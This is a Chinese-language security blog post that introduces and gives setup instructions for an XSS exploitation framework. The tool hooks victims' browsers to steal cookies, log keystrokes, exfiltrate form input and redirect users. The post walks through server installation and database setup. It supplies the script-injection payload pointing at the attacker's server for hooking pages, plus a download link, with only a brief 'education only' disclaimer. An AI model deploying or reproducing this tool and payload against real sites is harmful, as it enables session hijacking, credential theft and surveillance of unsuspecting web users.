Eswlnk Blog Eswlnk Blog
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈
  • 注册
  • 登录
首页 › 渗透分析 › XSS Exploitation Tool | XSS 漏洞利用工具

XSS Exploitation Tool | XSS 漏洞利用工具

Eswlnk的头像
Eswlnk
2023-06-10 12:22:18
XSS Exploitation Tool | XSS 漏洞利用工具-Eswlnk Blog
智能摘要 AI
XSS Exploitation Tool是一款专注于跨站脚本漏洞利用的渗透测试工具,可提取受害者浏览器技术数据、地理位置、页面快照与源码,并泄露输入字段数据、Cookies及记录键盘操作。其功能包括显示警告框和重定向用户。该工具仅限于教育用途,不得用于真实环境。安装需配置Apache、MySQL和PHP,并通过Git克隆源码、安装Composer依赖、初始化数据库及配置JavaScript钩子文件。使用时,需将钩子文件嵌入到目标页面中以捕获受害者的浏览器信息。

XSS Exploitation Tool是一款专注于跨站脚本漏洞利用的渗透测试工具。该工具提取了受害者浏览器的技术数据、受害者的地理位置以及上钩/访问页面的快照和源代码,同时泄露输入字段数据、渗出饼干并记录键盘操作。此工具仅用于教育目的,请勿在真实环境中使用。

特征

  • 受害者浏览器的技术数据
  • 受害者的地理位置
  • 上钩/访问页面的快照
  • 上钩/访问页面的源代码
  • 泄露输入字段数据
  • 渗出饼干
  • 键盘记录
  • 显示警告框
  • 重定向用户
XSS Exploitation Tool | XSS 漏洞利用工具-Eswlnk Blog

安装

在Debian 11上测试,您需要Apache、Mysql数据库和带有模块的PHP:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

安装Git并拉取XSS-Exploitation-Tool源代码:

$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

安装Composer,然后安装应用程序依赖项:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

初始化数据库:

bashCopy Code$ sudo mysql

创建具有特定权限的新用户:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

创建数据库(将产生一个空白页):

访问页面http://server-ip/reset_database.php

适配javascript钩子文件,文件hook.js是一个钩子。需要将第一行的ip地址替换为XSS漏洞利用工具的服务器ip地址:

var address = "your server ip";

如何运行

首先,创建一个页面(或利用跨站脚本漏洞)插入Javascript钩子文件(参见根目录下的exploit.html):

vulnerable_param=<script src="http://your_server_ip/hook.js"/>

然后,当受害者访问被钩住的页面时,XSS Exploitation Tool服务器应该列出被钩住的浏览器。

XSS Exploitation Tool | XSS 漏洞利用工具-Eswlnk Blog

截图

XSS Exploitation Tool | XSS 漏洞利用工具-Eswlnk Blog
XSS Exploitation Tool | XSS 漏洞利用工具-Eswlnk Blog

相关工具下载

XSS Exploitation Tool
下载
此工具仅用于教育目的,请勿在真实环境中使用
本站默认网盘访问密码:1166
本站默认网盘访问密码:1166
声明:本站原创文章文字版权归本站所有,转载务必注明作者和出处;本站转载文章仅仅代表原作者观点,不代表本站立场,图文版权归原作者所有。如有侵权,请联系我们删除。
xssxss漏洞渗透分析
0
0
Eswlnk的头像
Eswlnk
一个有点倒霉的研究牲站长
赞赏
广东电信网络崩溃的原因究竟是什么?
上一篇
Bypass Sandbox Evasion | 绕过恶意软件沙箱规避 Ram 检查
下一篇

评论 (0)

请登录以参与评论
现在登录
    发表评论

猜你喜欢

  • 「漏洞资讯」CVE-2025-12914:宝塔面板曝出注入漏洞
  • 「渗透分析」如何防范JS注入?nbcio-boot代码审计攻略大公开
  • 「漏洞资讯」多用户管理系统API接口调用存在前台SQL注入漏洞(0day)
  • 「漏洞资讯」1Panel面板前台RCE漏洞(CVE-2024-39911)
  • 「高危漏洞」xz 和 liblzma 5.6.0~5.6.1 被植入后门,威胁所有 x64 架构 Linux 和 macOS 用户
Eswlnk的头像

Eswlnk

一个有点倒霉的研究牲站长
1108
文章
319
评论
679
获赞

随便看看

WordPress 任意文件删除漏洞分析与防御
2023-05-30 12:15:40
「基准分析」年度渗透测试和代码审查范围
2022-08-07 14:51:25
绕过双因素身份验证的主要方法
2023-05-28 12:25:04

文章目录

专题展示

WordPress53

工程实践37

热门标签

360 AI API CDN java linux Nginx PDF PHP python SEO Windows WordPress 云服务器 云服务器知识 代码 免费 安全 安卓 工具 开发日志 微信 微软 手机 插件 攻防 攻防对抗 教程 日志 渗透分析 源码 漏洞 电脑 破解 系统 编程 网站优化 网络 网络安全 脚本 苹果 谷歌 软件 运维 逆向
  • 首页
  • 知识库
  • 地图
Copyright © 2023-2025 Eswlnk Blog. Designed by XiaoWu.
本站CDN由 壹盾安全 提供高防CDN安全防护服务
蜀ICP备20002650号-10
页面生成用时 0.591 秒   |  SQL查询 25 次
本站勉强运行:
友情链接: Eswlnk Blog 网站渗透 倦意博客 特资啦!个人资源分享站 祭夜博客 iBAAO壹宝头条
  • WordPress142
  • 网络安全64
  • 漏洞52
  • 软件52
  • 安全48
现在登录
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈